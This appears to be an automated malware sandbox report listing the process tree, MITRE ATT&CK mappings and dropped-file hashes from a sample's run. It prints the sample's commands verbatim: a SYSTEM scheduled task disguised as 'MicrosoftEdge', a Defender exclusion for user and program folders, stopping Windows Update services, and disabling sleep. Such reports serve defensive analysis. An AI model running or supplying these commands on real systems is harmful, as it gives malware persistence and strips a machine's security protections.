C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4656

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4908

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "MicrosoftEdge"
2⤵
PID:1992

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5252

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5260

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
PID:5748

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5560

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:5608

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:5772

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:5924

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:5740

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:5716

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:5860

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5872

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:5952

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:6028

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:1084

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:2504

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:5932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:624

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:216

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:5804

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:5612

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
PID:744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3692

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3892

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:4052

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3048

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:4092

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2312

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:1532

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:5032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1788

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4900

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:768

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4000

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3028

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:532

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2292

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
d2fb266b97caff2086bf0fa74eddb6b2

SHA1
2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

SHA256
b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

SHA512
c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
944B

MD5
6bd369f7c74a28194c991ed1404da30f

SHA1
0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

SHA256
878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

SHA512
8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
23KB

MD5
cd7b3e4dfecea7028bc1bdeda5a47477

SHA1
5c37dcaa4ed3c2a4051e4dc1714a342ac0de8365

SHA256
4d401337713e7f1c9f6588f8f7d79721e531c837b5f2f73c0b3cb372fd8f9b87

SHA512
ea11eb8d8347a39a1aa990a05cce6543e47145a1e618091750e2ad77497449e12e8b4d5b1e3385c9669cdd6a66e7dac96ff0e67913730c27c0ef2ff40a669f2d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

Filesize
29KB

MD5
28198fab85f1ac98f664600f670ba43d

SHA1
ee0dd46d793071270130c08412258d8c32194a32

SHA256
81bd52c3dd2417f30deadecbe5412bed404a86e05233b7b7ba6b7e8f682b5b49

SHA512
a1b3ff8361213c15bb077a3b9d31e9cb8b7705d04f2815395c13365972ca94e798f11532df48583fb3792df329d2a98ec903aa0457841da34f062f170de5d921

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

Filesize
23KB

MD5
82db06ca267ac7fdd878a1df35f41f4e

SHA1
9dae7f1ae60d7b83dbdada64fd1b4296f8f20051

SHA256
3847721350fd764d4d21cb4d2e02ab95c4ccdaa9d8ffefeb6f1078bf169ac6fb

SHA512
6e9beeca7caa94fc5dcf929d5af18d24acfc2a56612840b7084fb6057785d85b272eec8acdf4457c7dd1de9bee5e03fefc082a170131002229da0c01da9a8fb8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

Filesize
20KB

MD5
4588208961b6b7ed6cd974687346348a

SHA1
52085a4f6c875b6949261704f05050c1727e9c55

SHA256
95a95b07b4e0d051f83a51b680810572bd1244b42cb6e640d3b29b98f3e92885

SHA512
a9853353e68286f62535548ddbf1a97f1b39c1b6200161a660b1a4eac6864a1f6e93ab72d2cfe61249bf4543e2317f04babb3be211a37c12a55d55ee08b2b515

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a

Filesize
88KB

MD5
f64473f7f0d77763bf319a920044a5fe

SHA1
085e34089773af2ec9ec67f206d51e9ada6a84fb

SHA256
d0ce3ff70f038c52fd30f79350f60b4dff5c9bf0f327a1389c83c409a1f8846d

SHA512
25a85139b51b7b1e45a30c3cb8a5f53d7c7c09d7a636236a2abe56e7737c5ff1b7481d2d71ccdee2959c480cece1f753acc27998c1cb981c989b5b03aec5a20a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

Filesize
19KB

MD5
d37ece4290313a264b5e235c0dadf2fb

SHA1
9ae09bed58122b3d3c4914c45e682dce63993e14

SHA256
e08d9d0fd918211315836b13807379efdf0a22ac163c96f96c5a14d1212781bd

SHA512
28a9ebb27fa73557ed24458864558fca4666cfd53766795b2c6785202fba4ca67a29a25f48d3e11ff9bf462b070349571d67a92b1202ae42ca8583db3a781a9b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

Filesize
31KB

MD5
8e2a0e56ae25b282b437f9d5bd300d96

SHA1
5d4ba26731ee84ba9bbc5487312162b826ede550

SHA256
b48a7837a73459a7d6f545cb45a810533d9bf006a54077b2ca3bd62dd6f6315d

SHA512
a2529efb9941f92a6c84c40214bc9c7c97ab70dd69040238b82f9422bfb5424b41e3f56146017c4a9fdb545b17f84058e03c8179fd4f6385e542d799df5d7a4b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

Filesize
33KB

MD5
9f4e67ad569017c485ab74dcb3849d6e

SHA1
289bfaed2457ebad6803c4450d7b83c9a6c7ff2f

SHA256
ea3a25465a56b42205e0d65b5a9747ecd72ef189d393c4ae4e82f1cb7e752bd3

SHA512
dabbddbf8767018bb07053b871af7df3ddf6228c68710168980ce99f6d037db31f2e03417f9d07e0b2280fcef76c08bbc2f7251579674ae5f37fa606124cf4e6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

Filesize
32KB

MD5
057478083c1d55ea0c2182b24f6dd72f

SHA1
caf557cd276a76992084efc4c8857b66791a6b7f

SHA256
bb2f90081933c0f2475883ca2c5cfee94e96d7314a09433fffc42e37f4cffd3b

SHA512
98ff4416db333e5a5a8f8f299c393dd1a50f574a2c1c601a0724a8ea7fb652f6ec0ba2267390327185ebea55f5c5049ab486d88b4c5fc1585a6a975238507a15

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000f

Filesize
20KB

MD5
e648b4f809fa852297cf344248779163

SHA1
ea6b174e3bca31d6d29b84ffbcbcc3749e47892e

SHA256
637f545351fbed7e7207fdf36e1381b0860f12fffde46a6fa43bdafcc7a05758

SHA512
a2240d4a902c8245e3ffebd0509e25dd5005d0e6f075f5c78a46095b9a52d86ed483583a2a8b39f1ad4e610d2f7ec63e4ef8eab89936d30da937690936ef4f12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000012

Filesize
72KB

MD5
ce2f90b81ee3a43f46c29223ad1d981b

SHA1
b82b68c892bd7c8b0bf06a883f1bdcd8ca0121e5

SHA256
7b5c7bc066eb345c6c48189f960ad13fac80add5b5769e2d7a1f59d82a382505

SHA512
85333d169f9815e608eca91d3ba07b18ad6d121806caec0474fd73bcdf22cd0ec032058ae029fd8ac650667df7a382c1fe186ec15f2e13b224a253e7d7c3c674

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000028

Filesize
239KB

MD5
360b924e53a8c5241895b4a192f0630a

SHA1
4c025bd610e36cb2b875a497ba1a654d0d632bd4

SHA256
bb6e0f44d1ef5d076529d2917d186e692a89b72eb6ed0c1e239e90e8445aa39a

SHA512
4f9da9a666cdf70e47ed6f5e449990be945cc2b961c2debc1c79307b2afdef1d543040c645a06af8ea82b634001b0990a62a0d635f32d871347610d456a0b94c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000029

Filesize
40KB

MD5
4d8062a9ef905c7f972c9493b6d7572a

SHA1
d96d8fa7e61d1fe99579a90d209122e26dc10d34

SHA256
b3ac2a6d4d528ddc45ece3f27384612be8bc1dcee70cad6dccb3c05b246ac620

SHA512
0a03e3ce3f65fe6dcf40c3340c0deb2e9c115fde524a63bd0340afd2aeb06a6bab3826457a9f386355b9c0a1e1bd89b11dcd7d6b23ba1ba7ad860bfc1ac08447

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000031

Filesize
199KB

MD5
585ac11a4e8628c13c32de68f89f98d6

SHA1
bcea01f9deb8d6711088cb5c344ebd57997839db

SHA256
d692f27c385520c3b4078c35d78cdf154c424d09421dece6de73708659c7e2a6

SHA512
76d2ed3f41df567fe4d04060d9871684244764fc59b81cd574a521bb013a6d61955a6aedf390a1701e3bfc24f82d92fd062ca9e461086f762a3087c142211c19

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
888B

MD5
887d3eb5b67b774dd908994e7b22c60a

SHA1
f55aee95ba6e086cacd6bb01957da349cf6b51f9

SHA256
97168e9ef901002ff20ad5f0fb4b1e024c602a09f1911c6e3d1ac2c5975c58ef

SHA512
4c71455070a3be8fbdca43c9b4031282737a2757a0388623af996efc3c92b21370d48c2deb115c41208a8349ebd571f5074b17e1c2139c288902b91be27d9575

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_download.oxy.st_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_oxy.st_0.indexeddb.leveldb\MANIFEST-000001

Filesize
23B

MD5
3fd11ff447c1ee23538dc4d9724427a3

SHA1
1335e6f71cc4e3cf7025233523b4760f8893e9c9

SHA256
720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

SHA512
10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
e5c86533f0a2bf1f74a491308a6666be

SHA1
b370cc95728e19ee7bfe1f1b3adddd11e959dd55

SHA256
b1bb9eb02c8b788a5490c6cd51bbc0ab48b487f580f49b57c4bd37745afacdf7

SHA512
dd1cfb147ccf269dc6a1ea685ce798646fdfb0941ee68f0a57d6ddb38946c44ba154ca12f67248992cb177047f91dd015b1c5681f789f4f1962e5170f3317261

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
f00fd7c1f4cd935e3df845eec061a2d3

SHA1
7019361142fe9c9003bbd2d9e744a7d30699a840

SHA256
66a84f71d374484924a46752a49aa10212dc19607bd7c1f2f4853aec82eb76a2

SHA512
1751131ab327cbf60f768e2debee4c26cb8a34b69e0b6425d52823b7c71b6f78f0ed5a7028590e147b3f7f4cbaa423c7635b2eb0792137d5a8adef71e03d5315

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
4bd95aeb183638d1e16a724f947bb66c

SHA1
26f05576ee61f4d670b7810825bb13ebf947880d

SHA256
a0b53b75201505eeaacfa97b68b47538ad851b7ca643911570bf1ac65ceb58b1

SHA512
6d4385948ef8669fd1fe8ef59f213427830abef19f503ea01a542abaadd6ac22b958dc05a26e5164e1f7a5e71d8fa5a89dd41c16fe1cc830de8e26cbbb952f09

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
9e551d01a2b3a70cef79a3bcafa10489

SHA1
420de704143a7ef91f6ee394e4ed4caa6154ff7c

SHA256
c8396f3f5c0a9f69768fe5a8b0ea4efaf43ea79b675e21487f7ee814f762a21b

SHA512
ecf9898a70f77b53b76dd50aa3c0601c6778b032c4670011e49cc7735f5b18211e125a151e239be15d1898259ef953e4ed4585584a75e0aa86db88df0f4543b1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
a2894199df16b562f5043f8449d8bda9

SHA1
df4bd27ccdb78b66190fd23793f975f2ce764490

SHA256
d46803278dc2b460e094608ff7b374d772380fbe0047909bfc8a25b55e8a960b

SHA512
a720af1788089ed906e6b81ac631b8d85cf50fcadf418a7b37f4ffc78ed070190c77d32ee35ec13b4917c47611eea723dea1247eb0c4eeb51d9dbf4bc6092107

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
bbf720264ef33996b29f3d0517ff286c

SHA1
91835e1f48ceacd5b968193e0ef5ffbc993b06ca

SHA256
40cceb747492929960127df57cf5d63db76b8f56c90d3ed299c6e63294a1e9cb

SHA512
777a63af824fb6997c50f139336bb6623eebbf5ff58dd59a03d9525b3c9669df8241ca1074da49f35b3c377ffcdcbd5ec5e35fd2cdd2715699b2804a63b5835d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
cadedaf887f0d3f85413509afef0263d

SHA1
a872887f64b6491d059f3cf99dd1f83ce555cff5

SHA256
96baab2bbca842deece862b8520cba5517cd1042923952b35ae0fc6d0b709ffe

SHA512
7bedf9318315d36c1eb2f28404d7ffb60a9f8c471b8e25db461fafbfe1df975d4e4b596019a856d9d590e997b5e1639e90215a74793154477957ddd1953a6dcf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
a91a4b09220624809b1faff1570eccfa

SHA1
eda17ad6a1e552966aa3075ece1e09ab49620538

SHA256
aaf4b4aaf02b713e882b42f462e14aeca184cd4a9ba1c88d7793c6f74cbf27eb

SHA512
dce0efd204abb08a1ae1c919b6dc7ad353901efd16c2a8e7de84bd1e7da9851c940355c88a520ad7a382eafa5950d3f2818df33c9c69465092cdc1e51e1d6d8d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
46451af315c2c1160f3a8b48b741b1c7

SHA1
5bfae6e1318797e99ad48cfc287782f9869f3af8

SHA256
e5281056f05e777c74d1228ccef1353700f48240d54cbe489bdba7c164f90663

SHA512
f0e5b68f7fbf91e062223e98fb69d1cbe9c4c72046ff14e948c998df4fd8bfddfc3c7f16e8f58468ceb7476a3410e101da0414b4deade3e288d3f6d947b036f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
e3cd6ab0a84240e84ea72a578ba9f705

SHA1
56334251d6430c296f15f7b247c040f0ee14d458

SHA256
e455238296b3a8f1194aa7ad1be47d4e185df5da4223cbff4557da24efb3de29

SHA512
f9295f69b93a8bfc76ca6bb46edeca73b82f7c1c627b8bea27f0f4cd29a306326a545c2d2c617e4ded773137a7e350139cac105945a33225a5e8ad70deed3afb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5bac2b.TMP

Filesize
48B

MD5
c63c2d6a5666727e1be6255a61fd94ec

SHA1
6683b2c27b551cb39698dd870402716ec7a5317e

SHA256
ff25fe98174174a92caa2b7300ae67b71587fa01d5e8801bd285e35aa2913bcd

SHA512
af5b34b5905026c4a5928d072e8e1cd8bb495d8498e96c24b891e03d4bc0f8f86925a6c3d82bc339ecd00545d02fae411018eb72b8d53d6243ee0583b8816126

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
9c3a1f33cd355be54e38f2a2f7a9769a

SHA1
c1a21ad084d94c6857c6456eb0aeeeda64d6914c

SHA256
d2bbf4ae17704cfbe3c9b14a76ee5a9cf5a2b5b1cec07edbf239cef9940acb6f

SHA512
bdfb4ba8313bb684e5f3bce7598768cd7d8c975b104589014e24d07ab56bf3e94368651469d582e77d2f09150b57a3c784b54335991d7f6c3105699141f0d638

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
01893dd87d427f82b483ee219ddb460b

SHA1
6acde0f0f1bc2ad82c6fe8f152a80828dbe6fee9

SHA256
aa950e832006c565e92d72bc93b583f70b92f986efe197214c43213a3e4388ac

SHA512
826b90acc4b3b31d14b1a59e2108bee8a9ff9279d5913b92a4684652cf24db059153e35d193739165d1d891177ed6ac47ca7a3fe8c08051fde75c89b60056ee9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
277KB

MD5
e06622add6ac42dcc5d35c1b1fe05c04

SHA1
175a14d151e67ac08e429f6d87715ee71a1c2911

SHA256
eb6b7e798507663b09f0017faea44ed6f95b9e22ac0dd3147e241491a09ed72a

SHA512
254be2cf509c39ce40ff35130bbf06e3e6ef4f2a2ff068ef32c7157f92f8fd0505cf83a5a2fa5b980585f74dd1dbd2028874dd996f606fdb8ea93ac98d31d09e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
953b4cc84a942668d8b8b59daa004644

SHA1
c18e5ae79c7a4e632a32947b76b3f538f483fcfa

SHA256
2c540d246d2a5a6a88b683e7819474ef267d8f4313ac3ffc82d497dbb4ad04c3

SHA512
7ad11f968f5a45b48aad206756c0f76c64ea1e40298e705cd594f4e27aa417ec877bbf899c7a54ce5f316c3d18eb3f9e9533169e250fc26eb6da65198e086e23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
9432507ef7519af8ce33b27cd7bef1fa

SHA1
d05845d5f4012d72389509c5e5b1a7886b3b4e0f

SHA256
55964a7aa16d996fdb75ea52436a31a54c6a0342e86d8f98a6491ae7b6c7a1d8

SHA512
8481f395dfc3720bab2e2e3c44cb6ea8c4f656e91fbd63321741fbbdf6b768c2613df193862d6f12973840ced03482949c3b79b2637a4138da39e3ff9bea435c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
befab00f728dcf70360f199315c85a7e

SHA1
1e457efc202d3b4849000a6779d4aeaff8ea4b10

SHA256
6fa33b28ba061f0f85257aa7b7bc6ee81d260eb357a2d088188abc4f7c7eee4e

SHA512
27cb015c1cd4d7c88ecefbc6865fecd9ea0c49391ba765a30072e3eedd8a9b92d512f192cfc4b831c02295b3abb12f7782e6660200475f782eb1d1848ccdc496

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
100KB

MD5
0c5719fa13377bd454a96a40e475a5a1

SHA1
6d4d4b11c1df5061330dcf2c9579e6155f0d9f0b

SHA256
3e3146b89eeff60fb72cba7b42b4d7556da9e8dc4de62e4ba3d9abd387bcdd9a

SHA512
37941378cd3739f00a5e11a72af1d4042727f7e541b4100f0000f4ffd526a45ff7d6d2a83e18dbf0d99aba6df7e3dc3dd1d40c664cbdf3bdb75656d2274eb454

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57ebf6.TMP

Filesize
88KB

MD5
7ab3f34eeef565e08a333b46a5106e99

SHA1
24cb0a0ee0be82697eb75f1e2419520052f6f05b

SHA256
ed40628b2343cf0395bd6b7a456bf5408593f9b914775834bde3a89c4f9f752f

SHA512
d9eced888d73e75babf987c8133a6762967a2f0f16336541f470a856864b24b9a336d97b8ecd08b1cff0507cec8041428d2d5043f7024bc14b4665da50f6742f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
